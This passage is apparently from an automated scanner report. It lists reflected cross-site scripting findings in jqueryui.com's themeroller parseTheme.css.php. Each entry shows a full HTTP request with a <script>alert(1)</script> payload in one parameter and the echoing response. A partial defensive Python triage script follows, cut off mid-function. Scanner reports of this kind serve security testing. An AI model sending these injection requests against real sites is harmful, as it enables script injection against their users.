This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040486a3<script>alert(1)</script>334651bb09d&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:30 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040486a3<script>alert(1)</script>334651bb09d&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorH
...[SNIP]...

1.207. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorDefault request parameter is copied into the HTML document as plain text between tags. The payload 788fb<script>alert(1)</script>67297e189ba was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc788fb<script>alert(1)</script>67297e189ba&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:34 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
g&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc788fb<script>alert(1)</script>67297e189ba&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212
...[SNIP]...

1.208. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorError request parameter is copied into the HTML document as plain text between tags. The payload f918c<script>alert(1)</script>062f0580db6 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0af918c<script>alert(1)</script>062f0580db6&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:19 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
t_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0af918c<script>alert(1)</script>062f0580db6&fcError=cd0a0a&iconColorError=cd0a0a
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Helvetica, Arial, sans-serif; font-size: 1.1em; }
.ui-widget input, .ui
...[SNIP]...

1.209. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorHeader request parameter is copied into the HTML document as plain text between tags. The payload 2444c<script>alert(1)</script>12031a7a5b1 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=4040402444c<script>alert(1)</script>12031a7a5b1&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:25 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=4040402444c<script>alert(1)</script>12031a7a5b1&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault
...[SNIP]...

1.210. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorHighlight request parameter is copied into the HTML document as plain text between tags. The payload 6456d<script>alert(1)</script>154306ee43d was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=4040406456d<script>alert(1)</script>154306ee43d&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:01 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=4040406456d<script>alert(1)</script>154306ee43d&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a
*/


/* Component contain
...[SNIP]...

1.211. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorHover request parameter is copied into the HTML document as plain text between tags. The payload fce18<script>alert(1)</script>52d1a3f7398 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=ddddddfce18<script>alert(1)</script>52d1a3f7398&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:45 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=ddddddfce18<script>alert(1)</script>52d1a3f7398&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=55555
...[SNIP]...

1.212. http://jqueryui.com/themeroller/css/parseTheme.css.php [cornerRadius parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the cornerRadius request parameter is copied into the HTML document as plain text between tags. The payload c3d42<script>alert(1)</script>7894e4ccfcd was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5c3d42<script>alert(1)</script>7894e4ccfcd&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:15 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18829


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5c3d42<script>alert(1)</script>7894e4ccfcd&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureCont
...[SNIP]...

1.213. http://jqueryui.com/themeroller/css/parseTheme.css.php [cornerRadiusShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the HTML document as plain text between tags. The payload 60ff1<script>alert(1)</script>75be290cc19 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px60ff1<script>alert(1)</script>75be290cc19 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:26 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18126


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
verlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px60ff1<script>alert(1)</script>75be290cc19
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Trebuchet MS, Tahoma, Verdana, Arial, sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .
...[SNIP]...

1.214. http://jqueryui.com/themeroller/css/parseTheme.css.php [cornerRadiusUnit parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the cornerRadiusUnit request parameter is copied into the HTML document as plain text between tags. The payload d3c52<script>alert(1)</script>445d4d1b2e6 was submitted in the cornerRadiusUnit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=pxd3c52<script>alert(1)</script>445d4d1b2e6&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:15 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18829


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=pxd3c52<script>alert(1)</script>445d4d1b2e6&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.pn
...[SNIP]...
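A reviewer triaging this finding wants the facts above checked mechanically rather than taken from the scanner's "HTML document" wording. The Python below is an added example, not part of the scanner report and not jqueryui.com code: it parses a captured response, looks for the canary, and reports the declared Content-Type, whether X-Content-Type-Options: nosniff is present, whether the canary came back verbatim or HTML-encoded, and whether a text/css reflection sits inside a CSS comment or in rule text. The sample response is constructed from the headers and the first lines of the 1.214 response above, abbreviated; the function names are my own.

```python
"""Triage a reflected canary the way a reviewer checks a scanner finding.

Added example, not code from the scanner report or from jqueryui.com: it
re-derives the security-relevant facts of one finding from a captured
response (verbatim echo? declared type? nosniff? which context?).
"""
import html

# Constructed sample: headers and the start of the body of entry 1.214
# above, abbreviated to the lines that matter.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/0.7.62\r\n"
    "Content-Type: text/css\r\n"
    "Connection: close\r\n"
    "X-Powered-By: PHP/5.2.4-2ubuntu5.10\r\n"
    "\r\n"
    "\n/*\n* jQuery UI CSS Framework\n"
    "* To view and modify this theme, visit http://jqueryui.com/themeroller/"
    "?tr&cornerRadius=5&cornerRadiusUnit=pxd3c52<script>alert(1)</script>445d4d1b2e6"
    "&bgColorHeader=888888\n*/\n\n"
    ".ui-widget { font-family: Helvetica, Arial, sans-serif; font-size: 1.1em; }\n"
)
CANARY = "d3c52<script>alert(1)</script>445d4d1b2e6"


def split_response(raw):
    """Return (status line, lower-cased header dict, body) from a raw response."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
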